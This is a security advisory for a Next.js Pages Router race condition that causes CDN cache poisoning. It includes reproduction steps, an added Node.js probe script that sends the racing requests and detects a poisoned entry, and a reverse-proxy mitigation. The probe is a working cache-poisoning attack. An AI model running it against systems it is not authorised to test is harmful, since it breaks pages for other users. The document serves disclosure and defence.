Vercel Next.js
cpe:2.3:a:vercel:next.js:*:*:*:*:node.js:*:*
- < 14.2.24 (14.x line)
- < 15.1.6 (15.x line)
A race condition has been identified in Next.js affecting versions prior to 14.2.24 on the 14.x line and prior to 15.1.6 on the 15.x line. The issue is confined to the Pages Router and only manifests under certain misconfigurations; when it does, a standard page endpoint can inadvertently serve its `pageProps` data payload (the JSON normally returned for a data request) instead of the rendered HTML. The race is between two concurrent requests: one carrying the `?__nextDataRequest=1` query parameter and another carrying the `x-now-route-matches` header. Because some Content Delivery Network (CDN) providers cache `200 OK` responses that lack an explicit `cache-control` header, the mismatched response can be stored and served to subsequent users.
Exploitation results in CDN cache poisoning: an attacker injects a response that should never be cached (the JSON data payload) into a cacheable request, and the CDN then serves that poisoned response to other users. The bug grants no backend access or privilege escalation, but it breaks the affected page for every user who hits the poisoned cache entry, who receive incorrect data (the raw `pageProps` JSON) in place of the page they requested.
To reproduce, send two requests at the same time to a Pages Router application sitting behind such a CDN: one with the `?__nextDataRequest=1` query parameter and one with the `x-now-route-matches` header. When the timing lines up, the data response produced for the first request is returned for the second one, and because that second response is cacheable, the CDN stores it and replays it to later visitors.
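As an added example (not code from the advisory, from Vercel or from the Next.js project), the probe below fires the racing pair described above against a deployment you are authorised to test, then checks whether a plain follow-up request now comes back as the `pageProps` JSON instead of HTML. The base URL, the page path and the number of attempts are placeholders, and the value sent in `x-now-route-matches` is an assumption, since the advisory only requires the header to be present.

```javascript
// Added example: race probe for the Pages Router cache-poisoning condition.
// Requires Node.js 18+ (global fetch). Run probe() only against a target you own.

// Build the two requests that race: a data request selected through the query
// parameter, and an ordinary page request carrying the x-now-route-matches header.
function buildRaceRequests(baseUrl, pagePath) {
  const dataUrl = new URL(pagePath, baseUrl);
  dataUrl.searchParams.set("__nextDataRequest", "1");
  const pageUrl = new URL(pagePath, baseUrl);
  return [
    { url: dataUrl.toString(), headers: {} },
    // "1" is an assumed placeholder value; the advisory specifies only the header name.
    { url: pageUrl.toString(), headers: { "x-now-route-matches": "1" } },
  ];
}

// Classify what an endpoint returned. A healthy page response is HTML; a poisoned
// one is the Pages Router data payload, a JSON object carrying a pageProps key.
function classifyResponse(contentType, body) {
  const type = (contentType || "").toLowerCase();
  const text = body.trimStart();
  if (type.includes("text/html") || text.startsWith("<!DOCTYPE") || text.startsWith("<html")) {
    return "html";
  }
  if (type.includes("application/json") || text.startsWith("{")) {
    try {
      const parsed = JSON.parse(text);
      if (parsed && typeof parsed === "object" && "pageProps" in parsed) {
        return "pageprops-json";
      }
    } catch {
      // Not JSON after all; fall through to "other".
    }
  }
  return "other";
}

// Repeat the race, and after each round ask for the page with no parameter and no
// header, exactly as an ordinary visitor would. If that plain request ever returns
// the pageProps payload, the CDN is serving a poisoned entry.
async function probe(baseUrl, pagePath, attempts = 20) {
  for (let attempt = 1; attempt <= attempts; attempt++) {
    await Promise.all(
      buildRaceRequests(baseUrl, pagePath).map((r) => fetch(r.url, { headers: r.headers })),
    );
    const res = await fetch(new URL(pagePath, baseUrl));
    const cls = classifyResponse(res.headers.get("content-type"), await res.text());
    if (cls === "pageprops-json") {
      return { poisoned: true, attempt };
    }
  }
  return { poisoned: false, attempt: attempts };
}

// Usage (placeholders): probe("http://localhost:3000", "/about").then(console.log);
```

The check deliberately looks at the content of the follow-up response rather than at the two racing responses themselves: the race can succeed at the origin without the CDN retaining anything, and only a poisoned plain request proves the cache is now serving the wrong body.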
Upgrade to Next.js 14.2.24 or 15.1.6, or any later release on the respective line. If an immediate upgrade is not possible, strip the `x-now-route-matches` header from incoming requests at the CDN and set `cache-control: no-store` on all at-risk responses so that a mismatched response can never be retained.
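The following is an added example, not code from the advisory or from Vercel, showing the interim mitigation as an edge filter of the kind a CDN worker or reverse proxy in front of a self-hosted Pages Router application would apply: it drops `x-now-route-matches` from incoming requests and forces `cache-control: no-store` on data responses and on any `200 OK` that would otherwise leave without an explicit `cache-control` header. The upstream origin address and the listening port are assumptions.

```javascript
// Added example: edge-side mitigation for the Pages Router cache-poisoning race.

const UPSTREAM = { host: "127.0.0.1", port: 3000 }; // assumed origin, not from the advisory

// Remove the internal routing header whatever letter case the client used.
function stripRouteMatchHeader(headers) {
  const cleaned = {};
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() !== "x-now-route-matches") {
      cleaned[name] = value;
    }
  }
  return cleaned;
}

// A Pages Router data request is selected either by the query flag or by the
// /_next/data/ path; its JSON body must never be stored by the CDN.
function isDataRequest(rawUrl) {
  const url = new URL(rawUrl, "http://placeholder");
  return (
    url.searchParams.get("__nextDataRequest") === "1" ||
    url.pathname.startsWith("/_next/data/")
  );
}

// Force no-store on data responses and on any 200 that lacks an explicit
// cache-control header, the exact condition that lets a poisoned body persist.
// Responses that already carry a cache-control header for a normal page request
// are left alone so deliberate caching policy survives.
function hardenResponseHeaders(rawUrl, statusCode, headers) {
  const out = { ...headers };
  const cacheControlNames = Object.keys(out).filter((n) => n.toLowerCase() === "cache-control");
  if (isDataRequest(rawUrl) || (statusCode === 200 && cacheControlNames.length === 0)) {
    for (const n of cacheControlNames) {
      delete out[n];
    }
    out["cache-control"] = "no-store";
  }
  return out;
}

// Minimal reverse proxy wiring the two filters in front of the origin.
function startProxy(port) {
  const http = require("http");
  return http
    .createServer((clientReq, clientRes) => {
      const upstreamReq = http.request(
        {
          ...UPSTREAM,
          method: clientReq.method,
          path: clientReq.url,
          headers: stripRouteMatchHeader(clientReq.headers),
        },
        (upstreamRes) => {
          clientRes.writeHead(
            upstreamRes.statusCode,
            hardenResponseHeaders(clientReq.url, upstreamRes.statusCode, upstreamRes.headers),
          );
          upstreamRes.pipe(clientRes);
        },
      );
      upstreamReq.on("error", () => {
        clientRes.writeHead(502);
        clientRes.end();
      });
      clientReq.pipe(upstreamReq);
    })
    .listen(port);
}

// Usage (assumed port): startProxy(8080);
```

The blanket `no-store` on header-less `200` responses is the blunt part of this filter: it removes the CDN's ability to cache those pages at all, which is the trade the advisory's interim guidance accepts. Once the upgrade is in place the response side can be narrowed back to data requests only, while stripping the header at the edge costs nothing and can stay.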